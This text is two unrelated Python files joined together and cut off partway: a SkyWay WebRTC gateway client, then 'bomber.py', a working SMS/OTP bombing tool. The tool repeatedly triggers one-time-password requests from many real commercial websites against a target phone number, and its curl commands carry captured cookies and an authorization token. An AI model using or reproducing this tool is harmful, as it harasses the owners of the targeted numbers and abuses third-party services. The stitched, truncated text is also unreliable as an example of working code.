def __init__(self, gateway_addr='127.0.0.1', gateway_port=8000):
self.gateway_addr = gateway_addr
self.gateway_port = gateway_port
self.base_url = 'http://' + gateway_addr + ':' + str(gateway_port)
self.onDict = {}
self.open = True
def _request_thread(self, uri, params={}, expected_code=200):
while self.open:
res = requests.get(uri, params=params) # http request (blocking)
json_dict = res.json()
event = json_dict.get('event')
# run callback by event
if res.status_code == expected_code and event is not None and self.onDict.get(event.lower()) is not None:
func = self.onDict.get(event.lower())
func(json_dict)
def async_get(self, uri, params={}, expected_code=200):
thread = threading.Thread(target=self._request_thread, args=(uri, params, expected_code))
thread.start()
def close(self):
self.open = False
def on(self, event, callback):
self.onDict[event] = callback
class Data(AsyncRequest):
def __init__(self, redirect_port, data_connection_id=None):
super().__init__()
self.connection_id = data_connection_id
self.redirect_addr = self.gateway_addr
self.redirect_port = redirect_port
self.queue = None
self.thread_run_data = True
# Open data port
res = requests.post(
self.base_url + '/data',
json.dumps({}),
headers={'Content-Type': 'application/json'}
)
if res.status_code == 201:
body_data = res.json()
self.id = body_data['data_id']
self.ipv4_addr = body_data['ip_v4']
self.port = body_data['port']
if self.connection_id is None:
# As "Data Connect"
# WIP.
res = requests.post(
self.base_url + '/data/connections',
json.dumps({
}),
headers={'Content-Type': 'application/json'}
)
pass
else:
# As "Data Answer"
self.async_get(self.base_url + '/data/connections/' + self.connection_id + '/events')
self.on('close', self.close) # fire when disconnected any connection
self._setRedirect()
else:
raise Exception('Gateway returns code '+str(res.status_code)+' on opening data port')
def close(self, event=None):
# Close async get thread (at super class)
super().close()
# Close udp listener thread (on here)
self.thread_run_data = False
# Free data_connection_id
if self.connection_id is not None and event is None:
res = requests.delete(self.base_url + '/data/connections/' + self.connection_id)
if res.status_code != 204:
raise Exception('Gateway returns code '+str(res.status_code)+' on closing data connection')
# Free data_id
if self.id is not None:
res = requests.delete(self.base_url + '/data/' + self.id)
if res.status_code != 204 and res.status_code != 404: # 404 is disconnection from another peer
raise Exception('Gateway returns code '+str(res.status_code)+' on closing data port')
def _setRedirect(self):
params = {
'feed_params': {'data_id': self.id},
'redirect_params': {'ip_v4': self.redirect_addr, 'port': self.redirect_port}
}
res = requests.put(
self.base_url + '/data/connections/' + self.connection_id,
json.dumps(params),
headers={'Content-Type': 'application/json'}
)
if res.status_code != 200:
raise Exception('Gateway returns code '+str(res.status_code)+' on setting redirection of data connection')
def _udp_receive_thread(self, queue):
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.settimeout(0.5)
try:
udp.bind(('127.0.0.1', self.redirect_port))
except socket.timeout:
pass
while self.thread_run_data:
try:
data = udp.recv(128)
except socket.timeout:
pass
else:
queue.put(data)
udp.close()
def getQueue(self):
if self.queue is None:
queue = Queue()
thread = threading.Thread(target=self._udp_receive_thread, args=([queue]), name='UDP-Listener-'+str(self.redirect_port))
thread.start()
self.queue = queue
return self.queue
def getStatus(self):
res = requests.get(self.base_url + '/data/connections/' + self.connection_id + '/status')
j = res.json()
if res.status_code == 200 and j.get('open') is True:
return True
else:
return False
def send(self, message):
if type(message) is not bytes:
message = str(message).encode()
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.sendto(message, (self.ipv4_addr, self.port))
udp.close()
class Media(AsyncRequest):
def __init__(self, media_connection_id=None):
super().__init__()
self.id = ''
self.rtcp_id = ''
self.ipv4_addr = ''
self.port = 0
self.rtcp_port = 0
self.connection_id = media_connection_id
self._isHandledIncomingMedia = False
self._isHandledOutgoingMedia = False
# Open media port (RTCP)
res1 = requests.post(
self.base_url + '/media/rtcp',
json.dumps({}),
headers={'Content-Type': 'application/json'}
)
if res1.status_code == 201:
body_data = res1.json()
self.rtcp_id = body_data['rtcp_id']
self.rtcp_port = body_data['port']
# Open media port (RTP)
res2 = requests.post(
self.base_url + '/media',
json.dumps({'is_video': True}),
headers={'Content-Type': 'application/json'}
)
if res2.status_code == 201:
body_data = res2.json()
self.id = body_data['media_id']
self.ipv4_addr = body_data['ip_v4']
self.port = body_data['port']
if self.connection_id is None:
# As "Media Connect"
# WIP.
res3 = requests.post(
self.base_url + '/media/connections',
json.dumps({
}),
headers={'Content-Type': 'application/json'}
)
pass
else:
# As "Media Answer"
self.async_get(self.base_url + '/media/connections/' + self.connection_id + '/events')
self.on('close', self.close) # fire when disconnected any connection
else:
raise Exception('Gateway returns code '+str(res.status_code)+' on opening media port')
def close(self, event=None):
# Close async get thread (at super class)
super().close()
# Close udp listener thread (on here)
self.thread_run_media = False
# Free data_connection_id
if self.connection_id is not None and event is None:
res = requests.delete(self.base_url + '/media/connections/' + self.connection_id)
if res.status_code != 204:
raise Exception('Gateway returns code '+str(res.status_code)+' on closing media connection')
# Free media_id
if self.id is not None:
res = requests.delete(self.base_url + '/media/' + self.id)
if res.status_code != 204 and res.status_code != 404: # 404 is disconnection from another peer
raise Exception('Gateway returns code '+str(res.status_code)+' on closing media port')
# Free rtcp_id
if self.rtcp_id is not None:
res = requests.delete(self.base_url + '/media/rtcp' + self.id)
if res.status_code != 204 and res.status_code != 404: # 404 is disconnection from another peer
raise Exception('Gateway returns code '+str(res.status_code)+' on closing rtcp port')
def getStatus(self):
res = requests.get(self.base_url + '/media/connections/' + self.connection_id + '/status')
j = res.json()
if res.status_code == 200 and j.get('open') is True:
return True
else:
return False
def isRedirectedIncoming(self):
return self._isHandledIncomingMedia
def isRedirectedOutgoing(self):
return self._isHandledOutgoingMedia
def getSinkToAnswer(self, set_redirect_ipv4_to_get_call=None, set_redirect_port_to_get_call=None):
constraints = {
'video': True,
'videoReceiveEnabled': False,
'video_params': {
'band_width': 1500,
'codec': 'VP8',
'media_id': self.id,
'rtcp_id': self.rtcp_id,
'payload_type': 96
},
'audio': False,
'audioReceiveEnabled': False
}
if set_redirect_ipv4_to_get_call is None or set_redirect_port_to_get_call is None:
self._isHandledIncomingMedia = False
redirection = {}
else:
self._isHandledIncomingMedia = True
constraints['videoReceiveEnabled'] = False
redirection = {
'video': {
'ip_v4': set_redirect_ipv4_to_get_call,
'port': set_redirect_port_to_get_call
}
}
res = requests.post(
self.base_url + '/media/connections/' + self.connection_id + '/answer',
json.dumps({
'constraints': constraints,
'redirect_params': redirection
}),
headers={'Content-Type': 'application/json'}
)
if res.status_code == 202:
# Accepted
self._isHandledOutgoingMedia = True
return self.id, self.ipv4_addr, self.port
else:
self._isHandledOutgoingMedia = False
return False, False, False
class Peer(AsyncRequest):
def __init__(self, peer_id, api_key, turn=False, dumpMessage=False):
super().__init__()
self.id = peer_id
self.token = None
self.dataInstances = []
self.mediaInstances = []
self.dump = dumpMessage
# Connect to SkyWay server
params = {'key': api_key, 'domain': 'localhost', 'turn': turn, 'peer_id': self.id}
res = requests.post(
self.base_url + '/peers',
json.dumps(params),
headers={'Content-Type': 'application/json'}
)
if res.status_code == 201:
body_data = res.json()
self.token = body_data['params']['token']
self.async_get(
self.base_url + '/peers/' + self.id + '/events',
{'token': self.token}
)
self.on('connection', self._createDataInstance) # fire when receive data connection
self.on('call', self._createMediaInstance) # fire when receive media connection
else:
raise Exception('Gateway returns code '+str(res.status_code)+' on creating peer')
def close(self):
# Close async get thread (at super class)
super().close()
# Free data instances
for data in self.dataInstances:
data.close()
# Free media instances
for media in self.mediaInstances:
media.close()
# Free peer_id
if self.token is not None:
res = requests.delete(
self.base_url + '/peers/' + self.id,
params={'token': self.token}
)
if res.status_code != 204:
raise Exception('Gateway returns code '+str(res.status_code)+' on closing peer')
def _getFreePort(self):
used_ports = []
for data in self.dataInstances:
used_ports.append(data.redirect_port)
while True:
redirect_port = random.randint(32768, 60999)
if redirect_port not in used_ports:
break
return redirect_port
def _printStatus(self):
print('Skygate: Peer has', len(self.mediaInstances), 'media connection(s) and', len(self.dataInstances), 'data connection(s)')
def _createDataInstance(self, response):
redirect_port = self._getFreePort()
# get connection_id from incoming packet and generate data instance
data_connection_id = response['data_params']['data_connection_id']
data = Data(redirect_port, data_connection_id)
self.dataInstances.append(data)
if self.dump:
print('Skygate: Established data connection', data_connection_id)
self._printStatus()
def _createMediaInstance(self, response):
media_connection_id = response['call_params']['media_connection_id']
media = Media(media_connection_id)
self.mediaInstances.append(media)
if self.dump:
print('Skygate: Established media connection', media_connection_id)
self._printStatus()
def getDataConnections(self):
for i, data in enumerate(self.dataInstances):
if not data.open:
dead = self.dataInstances.pop(i)
try:
dead.close()
if self.dump:
print('Skygate: Closed data connection', dead.connection_id)
self._printStatus()
except Exception as e:
print(e)
return self.dataInstances
def getMediaConnections(self):
for i, media in enumerate(self.mediaInstances):
if not media.open:
dead = self.mediaInstances.pop(i)
try:
dead.close()
if self.dump:
print('Skygate: Closed media connection', dead.connection_id)
self._printStatus()
except Exception as e:
print(e)
return self.mediaInstances
|
bomber.py
|
#!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
import keyboard
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\0 33[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To SpeedX And All Other Contributors Listed At https://github.com/YashkumarNavadiya/BombBIT
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
██████ ██ ██████ ████████ ████████
██▒▒▒██ ██ ██▒▒▒██ ▒▒▒██▒▒▒ ▒▒▒██▒▒▒
██ ██ ████ ██ ██ ██ ██ ██ ██ ██
██████▒ ██▒▒██ ███ ███ █████ ██████▒ ██ ██
██▒▒▒██ ██ ██ ██▒█▒██ ██▒▒██ ██▒▒▒██ ██ ██
██ ██ ██ ██ ██ ▒ ██ ██ ██ ██ ██ ██ ██
██████▒ ▒████▒ ██ ██ █████▒ ██████▒ ████████ ██
▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒ ▒▒
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, max):
global count_inf
while True:
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo SpeedX >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
res = False
try:
requests.get('https://www.google.com', verify=True)
res = False
except Exception:
res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tBombBIT Will Stop Now...\n\n')
banner()
exit()
def getapi(pn, lim, cc):
global country_codes
cc = str(cc).strip()
cnn = country_codes[cc]
lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
os.system('curl -s -X POST -H "Host:m.netmeds.com" -H "content-length:76" -H "accept:*/*" -H "origin:https://m.netmeds.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://m.netmeds.com/customer/account/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:checkmobileno-popup=quWqfunF" -H "cookie:section_data_ids=%7B%22cart%22%3A1559721914%2C%22directory-data%22%3A1559721853%7D" -H "cookie:mage-messages=" -H "cookie:_gat_UA-63910444-1=1" -H "cookie:_gac_UA-63910444-1=1.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_gcl_aw=GCL.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_nmstracking=| sms | ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsUTMtrackingsource=ADW-CPC-Search-NMS-Brand-OC&ADW-CPC-Search-NMS-Brand-OC&CPC&ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsCampaign=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsMedium=CPC" -H "cookie:_nmsSource=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsAttr=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:private_content_version=eef016e2f8225f631d4a6e1cf8cdf4ac" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:form_key=YGWpwHiCN5uglOtY" -H "cookie:_gid=GA1.3.93227781.1559647218" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:_gcl_au=1.1.656472353.1559647214" -H "cookie:PHPSESSID=b5i36rg02l2jg9cielmm9fl7c6" -H "cookie:cto_lwid=e5917844-4f1b-48f9-bf74-b0bfdd5c79ce" -H "cookie:bsCoId=3558720339100" -H "cookie:bsUl=0" -H "cookie:_fbp=fb.1.1558720332185.799068042" -H "cookie:_ga=GA1.3.185497001.1558720330" -d \'register_mobileno=' + pn + '&logintype=Otp&uniq_identy=quWqfunF&forget_pwd=N\' "https://m.netmeds.com/sociallogin/popup/nmsgetcode/" > /dev/null 2>&1')
return True
elif lim == 4:
os.system(
'curl -s -X POST -H "Host:client-api.goomo.com" -H "origin:https://www.goomo.com" -H "client:m-web" -H "x-goomo-platform:mWeb" -H "dnt:1" -H "content-type:application/json" -H "accept:*/*" -H "referer:https://www.goomo.com/hotels" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d \'{"email":"fakeemail@gmail.com","phone_number":"' + pn + '","country_code":"' + cc + '"}\' "https://client-api.goomo.com/v2/phone_confirmation/verify_user" > /dev/null 2>&1')
return True
elif lim == 5:
os.system('curl -s -X POST -H "Accept:*/*" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-US,en;q=0.5" -H "Connection:keep-alive" -H "Content-Length:34" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:www.oriyamatrimony.com" -H "Referer:https://www.oriyamatrimony.com/" -H "User-Agent:Mozilla/5.0 (Windows NT 8.1; Win64; x64; rv:59.0) Gecko/20 Firefox/56.0" -H "X-Requested-With:XMLHttpRequest" -d "countrycode=' +
cc + '&mobileno=' + pn + '" "https://www.oriyamatrimony.com/login/mobileappsms-homepage.php" > /dev/null 2>&1')
return True
elif lim == 6:
os.system(
'curl -s -X POST -H "host:www.flipkart.com" -H "user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" -H "accept:*/*" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.flipkart.com/" -H "x-user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop" -H "origin:https://www.flipkart.com" -H "connection:keep-alive" -H "Content-Type:application/json; charset=utf-8" -H "Content-Length:53" -d \'{"loginId":["+' + cc + pn + '"],"supportAllStates":true}\' "https://www.flipkart.com/api/6/user/signup/status" > /dev/null 2>&1')
return True
elif lim == 7:
os.system('curl -s -X POST -H "Host:www.flipkart.com" -H "Connection:keep-alive" -H "Content-Length:60" -H "X-user-agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop" -H "Origin:https://www.flipkart.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded" -H "Accept:*/*" -H "Referer:https://www.flipkart.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:T=BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050; SWAB=build-44be9e47461a74d737914207bcbafc30; lux_uid=155867904381892986; AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg=1; AMCV_17EB401053DAF4840A490D4C%40AdobeOrg=-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI; s_cc=true; SN=2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078; gpv_pn=HomePage; gpv_pn_t=Homepage; S=d1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==; s_sq=%5B%5BB%5D%5D" -d \'loginId=+' + cc + pn + '&state=VERIFIED&churnEmailRequest=false\' "https://www.flipkart.com/api/5/user/otp/generate" > /dev/null 2>&1')
return True
elif lim == 8:
os.system('curl -s -X POST -H "Host:www.ref-r.com" -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Accept-Language:en-US,en;q=0.5" -H "Accept-Encoding:gzip, deflate, br" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With:XMLHttpRequest" -H "Content-Length:26" -H "DNT:1" -H "Connection:keep-alive" -d "mobile=' + pn + '&submit=1&undefined=" "https://www.ref-r.com/clients/lenskart/smsApi" > /dev/null 2>&1')
return True
elif lim == 9:
rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
os.system(
'curl -s -X POST -H "Host:m.pizzahut.co.in" -H "content-length:114" -H "origin:https://m.pizzahut.co.in" -H "authorization:Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4" -H "x-source-origin:PWAFW" -H "content-type:application/json" -H "accept:application/json, text/plain, */*" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "save-data:on" -H "languagecode:en" -H "referer:https://m.pizzahut.co.in/login" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_fbp=fb.2.1559973905081.1516144968" -H "cookie:_gat_UA-37858192-4=1" -H "cookie:_ga-ss=1|UA-37858192-4|https%3A%2F%2Fwww.google.com%2F" -H "cookie:_gid=GA1.3.1666290082.1559973902" -H "cookie:_ga=GA1.3.1893416092.1559973902" -H "cookie:run_fullstory_for_user=full_story_fail" -H "cookie:_gcl_au=1.1.2020385110.1559973902" -H "cookie:AKA_A2=A" -d \'{"customer":{"MobileNo":"' + pn + '","UserName":"' + pn + '","merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}\' "https://m.pizzahut.co.in/api/cart/send-otp?langCode=en" > /dev/null 2>&1')
return True
elif lim == 11:
os.system('curl -s -X POST -H "host:www.goibibo.com" -H "user-agent:Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0" -H "accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.goibibo.com/mobile/?sms=success" -H "content-type:application/x-www-form-urlencoded" -H "content-length:14" -H "connection:keep-alive" -H "upgrade-insecure-requests:1" -d "mbl=' + pn + '" "https://www.goibibo.com/common/downloadsms/" > /dev/null 2>&1')
return True
elif lim == 12:
os.popen('rm temp.xxx1 > /dev/null 2>&1')
os.system(
'curl -s -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "origin:https://www.apollopharmacy.in" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:__cfduid=d64c65a2edad54086382759cdf599de901558686615" -H "cookie:_ga=GA1.2.1278908803.1558686621" -H "cookie:__ta_device=fAz8eA9Rx40yyIiB5mzvHt4apFaSkMBA" -H "cookie:_fbp=fb.1.1558686627127.655454618" -H "cookie:__stat="BLOCK"" -H "cookie:jv_visits_count_EXRKNIzFkV=1" -H "cookie:__stp={"visit":"returning","uuid":"d9a1c39d-efbd-4911-ac0e-6333455f9fbb"}" -H "cookie:PHPSESSID=vnj2hvk8nga4v1m2hvlmvl88r4" -H "cookie:_gid=GA1.2.132668726.1560239715" -H "cookie:_gat=1" -H "cookie:__ta_visit=f5uvpYKu8EVmJAJmFGXMmXGSTiNQSWRS" -H "cookie:_gat_UA-31142855-1=1" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:private_content_version=46e6c8611a9b0d06e662da50ca5cf311" -H "cookie:AWSALB=2177QHjXXrFgaem1w0FrBqZ2aoKrMhI+DibolJaee9cVOP4ZSV2LiLC3tks68ud4ERCydxa8kb4klbiI+VEnNQB0rsyins1USgvHcPOUoz2nySN3SC5G/wpAACIq" -H "cookie:section_data_ids=%7B%22cart%22%3A1560239751%7D" -d \'mobile=' + pn + '\' "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" --output temp.xxx1')
while not os.path.exists('temp.xxx1'):
time.sleep(0.1)
rd = str(open('temp.xxx1', 'rb').read()) + " "
return rd.find("sent") != -1
elif lim == 13:
rd = ' '
try:
rd = os.popen(
